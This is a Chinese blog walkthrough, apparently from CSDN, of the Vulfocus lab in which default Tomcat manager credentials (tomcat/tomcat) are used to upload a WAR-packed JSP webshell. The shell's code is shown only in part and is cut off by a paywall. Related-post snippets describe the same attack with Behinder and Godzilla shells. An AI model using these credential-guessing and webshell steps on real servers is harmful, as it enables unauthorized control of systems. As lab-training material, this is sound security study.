【Vulfocus解题复现】tomcat-pass-getshell 弱口令

最新推荐文章于 2024-04-19 18:21:09 发布
最新推荐文章于 2024-04-19 18:21:09 发布
阅读量3.8k 收藏 13
点赞数 3
分类专栏: Vulfocus 文章标签: tomcat web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x650007/article/details/121333715
版权
本文介绍了Tomcat-pass-getshell漏洞,通过弱口令获取后台访问权限,部署jsp木马实现shell控制。解题过程包括使用默认账号登录、上传jsp木马并访问。分析了Tomcat后台权限和默认配置安全性。提出了限制运行权限、增强身份验证以及设置访问限制的修复措施。
摘要由CSDN通过智能技术生成

漏洞介绍

名称:Tomcat-pass-getshell 弱口令

描述:Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell

解题过程

1、打开靶场环境,并点击Manage App链接,通过弱口令登录平台,账号密码均为:tomcat

 2、拖动页面,找到war上传区域,上传jsp木马:

制作jsp木马,下段jsp木马密码为:passwd,将下述代码保存为jsp格式,并将jsp格式文件打包压缩成为war文件格式进行上传。

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
最低0.47元/天 解锁文章
温氏效应
关注
专栏目录
vulfocus-Tomcat-pass-Getshell复测过程
小羊的博客
12-23 532
1.漏洞概述 Apache+Tomcat 是很常用的网站解决方案,Apache 用于提供 web 服务,而 Tomcat 是 Apache 服务器的扩展,用于运行 jsp 页面和 servlet。Tomcat 有一个管理后台,其用户名和密码在 Tomcat 安装目录下的 conf\tomcat-users.xml 文件中配置,不少管理员为了方便,经常采用弱口令Tomcat 支持在后台部署 war 包,可以直接将 webshell 部署到 web 目录下,如果 tomcat 后台管理用户...
tomcat-pass-getshell 弱口令
Foreverlove112的博客
09-24 999
tomcat-pass-getshell 弱口令
VULFOCUS-tomcat-pass-getshell 弱口令
HAKUNAMATATATTA的博客
11-28 1801
VULFOCUS tomcat 弱口令靶场通关思路
[Vulfocus解题系列]Tomcat-pass-getshell 弱口令
00勇士王子的博客
07-04 2641
漏洞介绍 名称:Tomcat-pass-getshell 弱口令   描述: Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。 通过弱口令登录后台,部署war包geshell 解题过程 1.打开题目环境 2.既然是弱口令,那首先要先尝试登陆,点击 Manager App 3.弹出登陆窗口 4.尝试弱口令tomcat/tomcat 5.登陆成功: 可以在上图
tomcat-pass-getshell tomcat弱口令getshell
king丶
09-02 989
tomcat-pass-getshell tomcat弱口令getshell http://ip:port/manager/html tomcat tomcat 弱口令 将jsp 文件压缩成zip 格式 在修改成war 如图 OK 完事
Vulfocus解题复现】joomla 远程代码执行 (CVE-2021-23132)
温氏效应
11-23 5172
Joomla是一套知名的内容管理系统,其使用PHP语言和 MySQL数据库开发,可以在Linux、 Windows、MacOSX等各种不同的平台上运行 Joomla官方发布安全公告,修复了Joomla中的一个远程代码执行漏洞(CVE-2021-23132),其CVSSv3评分为7.5。由于Joomla com_media模块对上传文件校验不严格,攻击者可以通过上传恶意文件,从而实现远程代码执行。
Vulfocus解题复现】nostromo 远程命令执行 (CVE-2019-16278)
温氏效应
11-23 5037
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。
Vulfocus解题复现】Struts2 S2-013 Struts2 远程命令执行漏洞 (CVE-2013-1966)
温氏效应
09-04 2715
漏洞介绍 名称:Struts2 S2-013 远程命令执行漏洞 漏洞版本:Apache Group Struts 2.0.0 - 2.3.14 CVE标识符:CVE-2013-1966 描述:url和s:a标记都提供includeparams属性。该属性的主要作用域是了解包含或不包含http://request参数的内容。INCLUDEParams的允许值为:none-在URL中不包含任何参数(默认),get-仅在URL中包含get参数,all-在URL中同时包含get和post参数。当INCLUDEPa
Vulfocus解题复现】Struts2 S2-048 远程命令执行漏洞 (CVE-2017-9791)
温氏效应
09-04 3927
漏洞介绍 名称:Struts2 S2-048 远程命令执行漏洞 CVE标识符:CVE-2017-9791 描述:Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。 攻击者构造恶意字段值(value)通过Struts2的struts2-struts1-plugin传递给被攻击主机,从而实现RCE,获取远程主机的控制权限。 解题过程 1、打开靶场环境 2、.
vulfcous学习-tomcat-pass-getshell 弱口令
qq_43332837的博客
07-20 396
vulfcous学习-tomcat-pass-getshell 弱口令 打开靶机地址 尝试登陆 manager APP后台 tomcat/tomcat 制作war包 将jsp大马压缩为zip再更改后缀为war 访问 靶机url/压缩文件名/大马文件名.jsp 输入密码进入文件系统 输入/tmp得到flag ...
Tomcat-pass-getshell 弱口令 vulfocus夺旗
muhan的博客
04-16 3804
漏洞原因:后台登录使用弱口令,部署war包geshell 测试环境:Apache Tomcat/8.0.43 1、启动CVE-2017-12615目标靶场,并访问 默认账目密码:tomcat/tomcat 2、找到上传点进行上传war包 利用冰蝎的shell.jsp去生成war包 jar -cvf war.war "shell.jsp" 上传点进行上传 可以看到是否上传成功 3、无需访问木马文件,直接连冰蝎即可 http://123.58.236.76:24554/war/s
vulfocus靶场tomcat-pass-getshell 弱口令
最新发布
没有故事
04-19 285
连接: http://ip:port/目录/muma.jsp。哥斯拉:管理》生成〉javaDy> muma.jsp。通过弱口令登录后台,部署war包geshell。将生成的后门文件后缀名jsp改为war。上传文件:上传后会生成一个新的文件目录。登陆成功,上传恶意代码文件。
tomcat-pass-getshell 弱口令 学习解题过程
weicanh的博客
04-19 361
tomcat-pass-getshell 弱口令 解题过程
Tomcat-pass-getshell 弱口令
weixin_57567689的博客
10-19 429
Tomcat-pass-getshell 弱口令
Tomcat-pass-getshell弱口令漏洞复现
hot_milk1的博客
02-20 441
1、开启环境,进入网站 2、点击Manager App,弱口令admin登录 3、登陆成功 4、制作jsp木马,下段jsp木马密码为:passwd,将下述代码保存为jsp格式,并将jsp格式文件打包压缩成为war文件格式进行上传。 5、/压缩包文件名/一句话木马.jsp 6、打开蚁剑,进行连接,连接成功! 7、查看主目录下的tmp文件,找到flag!
vulfocus漏洞复现
08-21
根据引用的描述,已复现Vulfocus靶场漏洞有spring代码执行(CVE-2018-1273)。该漏洞是指当使用Spring Framework版本4.3.5之前的应用程序中使用了Expression Language(SpEL)的功能时,攻击者可以通过构造特定的SpEL表达式来执行任意代码。这可能导致远程攻击者在受影响的应用程序上执行恶意代码。 除了Vulfocus漏洞复现之外,根据引用,Drupal曝出了一个远程代码执行漏洞(CVE-2018-7600),攻击者可以利用该漏洞执行恶意代码,导致网站完全被控制。 另外,引用提到了WordPress的远程代码执行漏洞(CVE-2016-10033),该漏洞利用了PHPMailer漏洞,在WordPress Core代码中体现,攻击者可以利用该漏洞执行代码。 总结来说,Vulfocus漏洞复现的其中一个例子是spring代码执行漏洞(CVE-2018-1273)。此外,还存在Drupal远程代码执行漏洞(CVE-2018-7600)和WordPress远程代码执行漏洞(CVE-2016-10033)。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [[Vulfocus解题系列] 所复现漏洞总结](https://blog.csdn.net/qq_45813980/article/details/118720526)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

温氏效应

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值